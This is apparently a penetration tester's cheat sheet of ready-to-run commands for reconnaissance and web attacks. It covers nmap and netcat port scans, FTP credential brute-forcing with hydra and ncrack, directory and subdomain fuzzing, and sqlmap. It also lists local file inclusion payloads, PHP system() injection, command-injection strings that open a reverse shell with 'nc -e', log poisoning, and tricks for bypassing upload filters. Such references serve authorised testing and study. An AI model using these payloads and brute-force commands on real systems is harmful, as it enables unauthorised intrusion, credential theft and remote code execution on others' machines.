Information gathering is an important step in the process of penetration testing, which is the practice of simulating an attack on a computer system, network, or web application to identify vulnerabilities and assess the security of the system.
During the information gathering phase of a penetration test, the tester seeks to gather as much information as possible about the target system, including details about the hardware and software that are in use, the network configuration, and the security measures that are in place.

Port scanning using nmap

Use -vvv for nmap scan to increase verbosity

// TCP Scan
# TARGET=<TARGET> && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

// Vulnerability Scan
# nmap -n -sV --script vuln <TARGET> -Pn -vvv

// UDP scan
# nmap -p- --min-rate=1000 -T4 <TARGET> -Pn -sU -vvv

// Output in all formats
# nmap -p- -sC -sV -oA tcp_all_ports <TARGET>

// General scan
# nmap -sC -sV -oA nmap <TARGET>

Specific purpose scanning

FTP bruteforce

# nmap
# nmap --script ftp-brute -p 21 <TARGET> -Pn

// hydra
# hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>

// ncrack
# ncrack -v -U /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>

UDP 69 tftp

# nmap -n -Pn -sU -p69 -sV --script tftp-enum <TARGET>

Simple nc scanner

nc port scanner oneliner

// Normal scanning
# for p in {1..65535}; do nc -vn <TARGET> $p -w 1 -z & done 2# output.txt

// Using proxychains
# for p in {1..65535}; do proxychains -q nc -vn <TARGET> $p -w 1 -z & done 2# output.txt

bash port scanner script

#!/bin/bash
host=$1
for port in {1..65535}; do
 timeout .1 bash -c "echo >/dev/tcp/$host/$port" &&
 echo "port $port is open"
done
echo "Done"

Web path discovery

General tips

Some mis-spelled paths may give a hint
Don’t forget to vuln-search using Google
When GET doesn’t give anything, try POST
If cannot find HTTP, try HTTPS

dirb

// Using a common wordlist
# dirb http://<TARGET>
# dirb http://<TARGET> /usr/share/wordlists/dirb/common.txt

// Using a bigger wordlist
# dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt

// Amplify search with this extensions
# dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt -X .php,.txt,.json,.html

// Recursive search
# dirb http://<TARGET> -r

// Other recommended wordlists
* /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt
* /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt

dirsearch

# dirsearch -u http://<TARGET> -e php,asp,aspx,jsp,js,html,txt,sql -w /usr/share/wordlists/dirb/common.txt -f -r

-e EXTENSIONS, --extensions=EXTENSIONS  Extension list separated by comma (Example: php,asp)
-f, --force-extensions  Force extensions for every wordlist entry (like in DirBuster)
-r, --recursive

fuff

# ffuf -w /usr/share/wordlists/dirb/big.txt -H "Content-Type: application/json" -H "Cookie:..." -X POST  -u http://url/ -d '{"FUZZ": "value"}' -mc all -fr "specific_term" -c -v

wfuzz

# wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt --sc 200 http://<TARGET>/FUZZ

Subdomain enumeration

gobuster

# gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<TARGET>

wfuzz

# wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://<TARGET>/" -H "Host: FUZZ.<TARGET>" --hl 107
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt

fuff

# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<TARGET>/ -H "Host: FUZZ.<TARGET>" -fl 10

Web probing

curl

// basic-auth
# curl --user <user>:<pass# <TARGET>:<port>/pwn.php

# find all text on a page
# curl http://<TARGET>/ | html2text

# parse href in curl response
# curl http://<TARGET>/ | sed -n 's/.*href="\([^"]*\).*/\1/p'
# curl <TARGET> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

lfi

// lfi via php filter
# curl http://<TARGET>/index.php?m=php://filter/convert.base64-encode/resource=index

// lfi via string injection
# http://<TARGET>/index.php?page='.system('ls').'

cmd injection

${IFS} can be used as space for linux targets

# nc${IFS}<TARGET>${IFS}<PORT>${IFS}-e${IFS}bash

%0a can be used as newline for IE and inproperly sanitised webapp

# index.php?page=user%0a<cmd-payload>

; can be used to concat another command

aaaa;nc+-e+/bin/sh+<TARGET>

http headers injection

Apache log poisoning: write through User-Agent or URL into the log file and achieve RCE through LFI
Use burp to avoid encoding issues
http headers maybe spoofable, X-Forwarded-For: 127.0.0.1

sqlmap

// get
# sqlmap -u http://<TARGET>/login.php?search=test 

// post
# sqlmap -u http://<TARGET>/login.php?login=true -p user,password --data "user=1&password=2" --method POST

Image upload

Some the upload only checks for extension, change the extension before upload, then capture the request and change the filename parameter in the request body.
It is preferrable to use png where possible, because the format is cleaner than jpg/jpeg
GIF upload: a text file with the "GIF87a" magic byte without the quotes will be a GIF file

svn

Useful when you find a svn repo over the web

// get commit logs
# svn log --username admin --password admin http://<TARGET>/svn/dev/

// show differences
# svn diff -r 3:1 --username admin --password admin http://<TARGET>/svn/dev/

Exploits Search

CTF search: https://ippsec.rocks/
CVE POC: https://github.com/nomi-sec/PoC-in-GitHub

Useful references

Default username and passwords: https://datarecovery.com/rd/default-passwords/
https://book.hacktricks.xyz/
https://www.hackingarticles.in/